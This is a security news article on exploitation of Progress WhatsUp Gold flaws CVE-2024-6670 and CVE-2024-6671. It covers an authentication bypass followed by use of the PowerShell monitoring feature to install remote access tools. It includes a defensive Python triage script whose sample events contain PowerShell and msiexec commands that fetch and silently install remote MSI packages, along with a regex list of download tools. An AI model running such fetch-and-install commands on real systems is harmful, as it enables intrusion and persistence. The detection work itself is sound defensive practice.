WhatsUp Gold Exploit: PoC Release Prevails As The Root Cause
According to recent media reports, a publicly available proof-of-concept (PoC) for Progress's WhatsUp Gold is likely being used by threat actors to exploit the software. Malicious activity is said to have started five hours after the PoC was released. In this article, we dive into the details of the WhatsUp Gold exploit and the underlying vulnerabilities.
WhatsUp Gold Exploit Uncovered
The recent exploitation of critical vulnerabilities in WhatsUp Gold involves two flaws tracked as CVE-2024-6670 and CVE-2024-6671. Both carry a Common Vulnerability Scoring System (CVSS) score of 9.8, and their discovery is credited to security researcher Sina Kheirkhah of the Summoning Team.
The notable part about the WhatsUp Gold exploit is that both vulnerabilities were patched in mid-August, yet exploitation began on August 30th. Commenting on the timeline of the attacks, Trend Micro researchers Hitomi Kimura and Maria Emreen Viray stated:
“The timeline of events suggests that despite the availability of patches, some organizations were unable to apply them quickly, leading to incidents almost immediately following the PoC’s publication.”
CVE-2024-6671 And CVE-2024-6670 Exploit Details
Based on the observed WhatsUp Gold exploit, attackers first bypass the software's authentication. They then abuse the Active Monitor PowerShell Script functionality to download remote access tools that establish persistence. The tools observed include:
- Radmin
- Atera Agent
- Splashtop Remote
- SimpleHelp Remote Access
Both Atera Agent and Splashtop Remote are installed on a compromised system from a single MSI installer file, which the attackers retrieve from a remote server. Describing the WhatsUp Gold executable involved, the researchers said:
“The polling process NmPoller.exe, the WhatsUp Gold executable, seems to be able to host a script called Active Monitor PowerShell Script as a legitimate function. The threat actors in this case, chose it to perform for remote arbitrary code execution.”
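Because NmPoller.exe legitimately runs Active Monitor PowerShell scripts, a defender cannot simply alert on every PowerShell child of the polling process; the distinguishing signal in this incident is the child process fetching an installer from a remote server and running it. The following triage function is an added example written for this article, not code from Trend Micro, Progress or the article's sources. The process-creation events, field names, the WhatsUp install path and the download/install indicators are all constructed assumptions for illustration; a real deployment would map them onto the EDR or Sysmon schema in use.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample process-creation events (not from any real incident). The
# install path and field names are assumptions mimicking a simplified EDR export.
WUG_PATH = r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe"
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSIEXEC_PATH = r"C:\Windows\System32\msiexec.exe"

SAMPLE_EVENTS = [
    # Poller spawns PowerShell that downloads an MSI and installs it silently.
    {"parent": WUG_PATH, "child": PS_PATH,
     "cmdline": 'powershell.exe -NoProfile -Command "Invoke-WebRequest http://example.invalid/setup.msi '
                '-OutFile C:\\Users\\Public\\setup.msi; msiexec /i C:\\Users\\Public\\setup.msi /qn"'},
    # Poller spawns PowerShell for a benign-looking service check (legitimate Active Monitor use).
    {"parent": WUG_PATH, "child": PS_PATH,
     "cmdline": 'powershell.exe -NoProfile -Command "Get-Service -Name W3SVC | Select-Object Status"'},
    # Unrelated parent: an admin installing a local package from Explorer.
    {"parent": r"C:\Windows\explorer.exe", "child": MSIEXEC_PATH,
     "cmdline": "msiexec /i C:\\Installers\\corp-agent.msi /qn"},
    # Poller spawns msiexec directly with a remote package source.
    {"parent": WUG_PATH, "child": MSIEXEC_PATH,
     "cmdline": "msiexec /i http://example.invalid/agent.msi /quiet"},
]

# Child processes worth scrutiny when spawned by the WhatsUp Gold poller.
SUSPECT_CHILDREN = {"powershell.exe", "pwsh.exe", "msiexec.exe", "cmd.exe"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Common download primitives; this list is an assumption, extend it for your environment.
DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadString|DownloadFile|"
    r"Start-BitsTransfer|\bcurl\b|\bwget\b|bitsadmin",
    re.IGNORECASE,
)
MSIEXEC_RE = re.compile(r"\bmsiexec\b", re.IGNORECASE)


@dataclass
class Finding:
    severity: str      # "high", "medium" or "low"
    child: str
    reason: str
    urls: list


def _basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage_event(event: dict) -> Optional[Finding]:
    """Classify one process-creation event; None means 'not relevant to this pattern'."""
    if _basename(event["parent"]) != "nmpoller.exe":
        return None
    child = _basename(event["child"])
    if child not in SUSPECT_CHILDREN:
        return None

    cmd = event["cmdline"]
    urls = URL_RE.findall(cmd)
    downloads = bool(DOWNLOAD_RE.search(cmd))
    installs = child == "msiexec.exe" or bool(MSIEXEC_RE.search(cmd))

    # Remote source combined with a fetch or an installer run is the shape described
    # in the article: poller -> script -> remote MSI -> remote access tool.
    if urls and (downloads or installs):
        return Finding("high", child, "remote URL combined with download/install activity", urls)
    if urls or downloads or installs:
        return Finding("medium", child, "download or installer activity without a clear remote source", urls)
    # Poller -> scripting host with nothing else is expected Active Monitor behaviour,
    # but keep it visible for baselining.
    return Finding("low", child, "scripting child of NmPoller.exe, no download indicators", urls)


def triage_events(events: list) -> list:
    """Run triage over a batch and drop events that do not match the parent/child pattern."""
    return [f for f in (triage_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in triage_events(SAMPLE_EVENTS):
        print(f"[{finding.severity.upper():6}] {finding.child}: {finding.reason} {finding.urls}")
```

The value of the severity split is that the low-severity bucket lets a team baseline which Active Monitor scripts normally run under NmPoller.exe, so that a new script reaching out to an external host stands out instead of being buried in alerts on every PowerShell launch.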
Continued Exploits Of Patched Flaws
As per recent reports, no follow-on exploitation attempts have been detected. However, the use of several remote access tools indicates the involvement of a threat actor. It is worth noting that this is not an isolated incident: critical vulnerabilities in WhatsUp Gold have been actively exploited in the wild before as well.
Early last month, the Shadowserver Foundation, a non-profit security organization, stated that it had observed exploitation of CVE-2024-4885. That vulnerability also has a CVSS score of 9.8 and is another flaw that Progress patched in June 2024.
This disclosure came weeks after Trend Micro revealed exploitation of a patched security flaw in Atlassian Confluence Data Center and Confluence Server. The Atlassian vulnerability, tracked as CVE-2023-22527, had a CVSS score of 10.0 and was exploited to deliver the Godzilla web shell.
Conclusion
Despite the availability of patches, critical vulnerabilities in WhatsUp Gold, such as CVE-2024-6670 and CVE-2024-6671, continue to be exploited by threat actors. This WhatsUp Gold exploit highlights the importance of prompt patch management, as even short delays can lead to significant security breaches and persistent threats. Organizations should also emphasize proactive security controls to mitigate such threats.
The sources for this piece include articles in The Hacker News and Bleeping Computer.